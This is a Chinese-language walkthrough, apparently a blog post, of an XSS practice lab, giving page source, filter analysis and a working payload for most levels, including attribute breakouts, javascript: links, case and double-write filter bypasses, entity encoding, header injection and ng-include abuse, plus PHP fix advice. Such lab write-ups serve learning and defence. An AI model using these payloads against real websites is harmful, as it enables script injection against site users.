By:Mirror王宇陽javascript
time:2020/04/06php
咱們進入到這個頁面以後,快速關注到幾個點,Xss注重的輸入點,這裏的輸入點首先在URL欄中找到了name
值,Payload檢測了該值的長度,因此咱們接下來的全部動做都在這個地方進行。html
咱們翻開源碼發現java
<body> <h1 align=center>歡迎來到level1</h1> <h2 align=center>歡迎用戶test</h2> <center><img src=level1.png></center> <h3 align=center>payload的長度:4</h3> </body>
咱們能夠對name
熟悉作手腳,試構造Payload:angularjs
name=<script>alert(/xss/)</script>
修復建議後端
<!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不錯!"); window.location.href="level2.php?keyword=test"; } </script> <title>歡迎來到level1</title> </head> <body> <h1 align=center>歡迎來到level1</h1> <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>歡迎用戶".$str."</h2>"; ?> <center><img src=level1.png></center> <?php echo "<h3 align=center>payload的長度:".strlen($str)."</h3>"; ?> </body> </html>
從源碼中能夠看出問題出自$str = $_GET["name"];
,將用戶輸入的內容原樣輸出了app
$str = htmlspecialchars($_GET["name"] , ENT_QUOTES);
使用 htmlspecialchars
函數轉爲HTML實體,留意第二個參數不要忘了!後續的許多源碼與這裏同一個道理,具體的在作解釋!xss
本題題面看不出區別,可是HTML就有所構造不一樣了函數
<body> <h1 align=center>歡迎來到level2</h1> <h2 align=center>沒有找到和<>test相關的結果.</h2><center> <form action=level2.php method=GET> <input name=keyword value="<>test"> <input type=submit name=submit value="搜索"/> </form> </center><center><img src=level2.png></center> <h3 align=center>payload的長度:6</h3></body>
沒錯,後臺使用了函數對<>
進行了HTML實體,不過咱們也仍是發現了一個點!學習
<input name=keyword value="<>test">
input輸入點,沒錯後端在搜索後是保留搜索的關鍵字內容,全部這就是缺洞!
"><script>alert(1)</script><"
Payload完美的閉合了input標籤
<input name=keyword value=""><script>alert(1)</script><"">
<body> <h1 align=center>歡迎來到level3</h1> <h2 align=center>沒有找到和<>test相關的結果.</h2><center> <form action=level3.php method=GET> <input name=keyword value='<>test'> <input type=submit name=submit value=搜索 /> </form> </center><center><img src=level3.png></center> <h3 align=center>payload的長度:6</h3></body>
這裏將level2的漏給堵上了!咱們從<>
能夠得知後端是利用htmlspecialchars
函數轉爲HTML實體編碼後輸出的,但咱們在level1的時候說了htmlspecialchars
存在一種開發手誤,就是後端開發忘記了設置函數的第二參數致使「會轉換雙引號,不轉換單引號」
ps:這裏的input標籤中的屬性使用的單引號,因此咱們的Payload才能夠成功!
' onclick=alert(1) '
<input name=keyword value='' onclick=alert(1) ''>
這裏有一點比較有趣,就是onclick這個屬性;咱們都知道輸入框輸入以後,保留輸入內容,而咱們的onclick
就會保留在input標籤中,而觸發條件須要咱們單擊輸入框。
發生了一個比較玄學的東西,咱們再來瞅瞅HTML源碼
<body> <h1 align=center>歡迎來到level4</h1> <h2 align=center>沒有找到和<>text相關的結果.</h2><center> <form action=level4.php method=GET> <input name=keyword value="text"> <input type=submit name=submit value=搜索 /> </form> </center><center><img src=level4.png></center> <h3 align=center>payload的長度:4</h3></body>
<input name=keyword value="text">
沒錯,咱們輸入的兩個尖括號消失了;並且input標籤採用了雙引號,level3的方法也是行不通的!不過我仍是「畫蛇添足」的使用雙引號
" onclick=alert(1) "
沒想到!成功了!看樣子後端沒有HTML實體編碼!
<body> <h1 align=center>歡迎來到level5</h1> <h2 align=center>沒有找到和<script></srcipt> ' " test相關的結果.</h2><center> <form action=level5.php method=GET> <input name=keyword value="<scr_ipt></srcipt> ' " test"> <input type=submit name=submit value=搜索 /> </form> </center><center><img src=level5.png></center> <h3 align=center>payload的長度:27</h3></body>
綜合了幾個不一樣的payload特性測試了level5的過濾方式,發如今<h2>
標籤使用了HTML實體編碼,在<input>
標籤則沒有使用HTML實體編碼而是作了些過濾刪改「 對script轉爲scr_ipt 」,後續測試發現 「onclick =》 o_click」,雙寫、大小寫混合等方式均失敗!
繞過的策略就是避開他拉黑的函數,使用其它的方式觸發!其它事件屬性測試後發現沒有效果,都被加了下劃線隔開了!可見事件觸發式不行的了!
另闢蹊徑~咱們……使用a標籤去繞過對scrip標籤的檢查和事件屬性的檢測
"><a href="javascript:alert(/xss/)">alert</a> <"
<body> <h1 align=center>歡迎來到level6</h1> <h2 align=center>沒有找到和<script> <a> href \ " ' alert相關的結果.</h2><center> <form action=level6.php method=GET> <input name=keyword value="<scr_ipt> <a> hr_ef \ " ' alert"> <input type=submit name=submit value=搜索 /> </form> </center><center><img src=level6.png></center> <h3 align=center>payload的長度:32</h3></body>
能夠發現,對上一關的 href
作了過濾隔開!測了上前五關的payload,而後使用雙寫、大小寫方式繞過:
"><a HREf="javascript:alert(/xss/)">alert</a> <"
<body> <h1 align=center>歡迎來到level7</h1> <h2 align=center>沒有找到和<script> <a> href \ " ' alert相關的結果.</h2><center> <form action=level7.php method=GET> <input name=keyword value="<> <a> \ " ' alert"> <input type=submit name=submit value=搜索 /> </form> </center><center><img src=level7.png></center> <h3 align=center>payload的長度:20</h3></body>
這裏能夠看出簡單粗暴的處理方式,直接將敏感內容爲空了!而後使用雙寫、大小寫方式繞過:
"><a hrehreff="javascripscriptt:alert(/xss/)">alert</a> <"
level6:沒有對輸入變量進行統一小寫/大寫轉換,應該添加
strtolower
函數統一小寫,便於如下操做:$str = $_GET["keyword"]; $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5);level7:必須注意
str_replace
函數,該函數只對字符串進行一次查找並所有替換、大小寫敏感;解決方法就是將替換後的字符串再一次做爲替換源進行替換。$str =strtolower( $_GET["keyword"]); $str2=str_replace("script","",$str); $str3=str_replace("on","",$str2); $str4=str_replace("src","",$str3); $str5=str_replace("data","",$str4); $str6=str_replace("href","",$str5);
能夠看出,這裏的輸入內容是一個超連接!
<body> <h1 align=center>歡迎來到level8</h1> <center> <form action=level8.php method=GET> <input name=keyword value="<><script>onclick ' " / alert herf "> <input type=submit name=submit value=添加友情連接 /> </form> </center><center><BR><a href="<><scr_ipt>o_nclick ' " / alert herf ">友情連接</a></center><center><img src=level8.jpg></center> <h3 align=center>payload的長度:41</h3></body>
第一時間想到了 javascript:alert(xss)
,可是發現 script
被分割了!
經過前輩的思路,學來了編碼繞過…… HTML編碼 >> 照例解析 >> 輸出HTML代碼(咱們輸入的HTML編碼 輸出的則是代碼,HTML實體編碼在HTML頁面會被解析而在後端看不到)
javascript:alert(/xss/)
javascript:alert(/xss/)
<body> <h1 align=center>歡迎來到level9</h1> <center> <form action=level9.php method=GET> <input name=keyword value="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x2f;&#x78;&#x73;&#x73;&#x2f;&#x29;"> <input type=submit name=submit value=添加友情連接 /> </form> </center><center><BR><a href="您的連接不合法?有沒有!">友情連接</a></center><center><img src=level9.png></center> <h3 align=center>payload的長度:138</h3></body>
使用level8-payload測試,發現如上!推測後端對咱們的輸入內容進行了檢測!
if(false===strpos($str7,'http://')) { echo '<center><BR><a href="您的連接不合法?有沒有!">友情連接</a></center>'; } else { echo '<center><BR><a href="'.$str7.'">友情連接</a></center>'; }
後端檢測了字符串中是否有「http://」,咱們須要在合適的地方插入它:
javascript:alert('http://')
<body> <h1 align=center>歡迎來到level10</h1> <h2 align=center>沒有找到和<><script> onclick ' " /相關的結果.</h2><center> <form id=search> <input name="t_link" value="" type="hidden"> <input name="t_history" value="" type="hidden"> <input name="t_sort" value="" type="hidden"> </form> </center><center><img src=level10.png></center> <h3 align=center>payload的長度:24</h3></body>
keyword
值被HTML實體編碼了,沒有利用的必要了,也沒有閉合的可能!
關注三個被隱藏的input標籤:?keyword=test&t_link=test&t_history&t_sort=test
只有t_sort
這個參數有了效果,構造:
" onclick=alert(/xss/) type="text" ><
?keyword=test&t_sort=" onclick=alert(/xss/) type="text" ><
<input name="t_sort" value="" onclick=alert(/xss/) type="text" " type="hidden">
ok~~~🙂
<body> <h1 align=center>歡迎來到level11</h1> <h2 align=center>沒有找到和test相關的結果.</h2><center> <form id=search> <input name="t_link" value="" type="hidden"> <input name="t_history" value="" type="hidden"> <input name="t_sort" value="" onclick=alert(/xss/) type="text" ><" type="hidden"> <input name="t_ref" value="" type="hidden"> </form> </center><center><img src=level11.png></center> <h3 align=center>payload的長度:4</h3></body>
?keyword=test&t_link=test&t_history&t_sort=test
t_sort
被HTML實體編碼,雙引號閉合,沒戲了!換一個思路t_ref
的參數值是請求包中的Referer
ok~~~🙂
<body> <h1 align=center>歡迎來到level12</h1> <h2 align=center>沒有找到和good job!相關的結果.</h2><center> <form id=search> <input name="t_link" value="" type="hidden"> <input name="t_history" value="" type="hidden"> <input name="t_sort" value="" type="hidden"> <input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" type="hidden"> </form> </center><center><img src=level12.png></center> <h3 align=center>payload的長度:9</h3></body>
和level11一模一樣
ok~~~🙂
<body> <h1 align=center>歡迎來到level13</h1> <h2 align=center>沒有找到和good job!相關的結果.</h2><center> <form id=search> <input name="t_link" value="" type="hidden"> <input name="t_history" value="" type="hidden"> <input name="t_sort" value="" type="hidden"> <input name="t_cook" value="" type="hidden"> </form> </center><center><img src=level13.png></center> <h3 align=center>payload的長度:9</h3></body>
ok~~~🙂
環境出現問題 ~~~ ❓ 」shy014「復現level14關
<html ng-app> <head> <meta charset="utf-8"> <script src="angular.min.js"></script> <script> window.alert = function() { confirm("完成的不錯!"); window.location.href="level16.php?keyword=test"; } </script> <title>歡迎來到level15</title> </head> <h1 align=center>歡迎來到第15關,本身想個辦法走出去吧!</h1> <p align=center><img src=level15.png></p> <body><span class="ng-include:1.gif"></span></body>
眨眼一看很是的懵啊!而後仔細觀察了src
參數值1.gif
而頁面並無成功的載入該圖片;因而我注意到angular.min.js
,我不瞭解Angular,因此我查了class="ng-include"
AngularJS ng-include
指令 用於包含外部的HTML文件,包含的內容做爲元素的子節點,屬性值能夠是一個表達式返回一個文件名;意思就是咱們能夠利用src包含一個存在xss的頁面(包含level13/12/11沒反應)
src= 'level10.php?t_sort=" onclick=alert(/xss/) type="text" >< '
<body> <h1 align=center>歡迎來到level16</h1> <center><>< > scrip t " ' \</center> <center><img src=level16.png></center> <h3 align=center>payload的長度:4</h3></body>
level16.php?keyword=<><script>script scripScrIPtt " ' \
後端過濾了script
\
替換爲 
可是每有過濾尖括號,咱們使用img標籤
<img%0asrc=x%0aonerror=alert(1)>
這裏的%0a
是換行,之因此不用空格是發現後端還過濾的空格
<body> <h1 align=center>歡迎來到level17</h1> <embed src=xsf01.swf?a=<><scripscriptt> ' " \ () onclick onerror img width=100% heigth=100%><h2 align=center>成功後,<a href=level18.php?arg01=a&arg02=b>點我進入下一關</a></h2> </body>
level17.php?arg01=a&arg02==<><scripscriptt> ' " \ () onclick onerror img
尖括號、雙引號均被HTML實體編碼;一般是採用閉合的方式xss,但這裏直接把尖括號給斃了!因此就得考慮其它思路。
?arg01=a&arg02=b%0aonmouseover%3dalert(1)
<body> <h1 align=center>歡迎來到level18</h1> <embed src=xsf02.swf?a=b width=100% heigth=100%></body>
?arg01=a&arg02=b%0aonmouseover%3dalert(1)
和level19 同一個payload 🙂
首先修改 的寬高,而後就會全顯示以下:
能力以外的兩關關於flash
END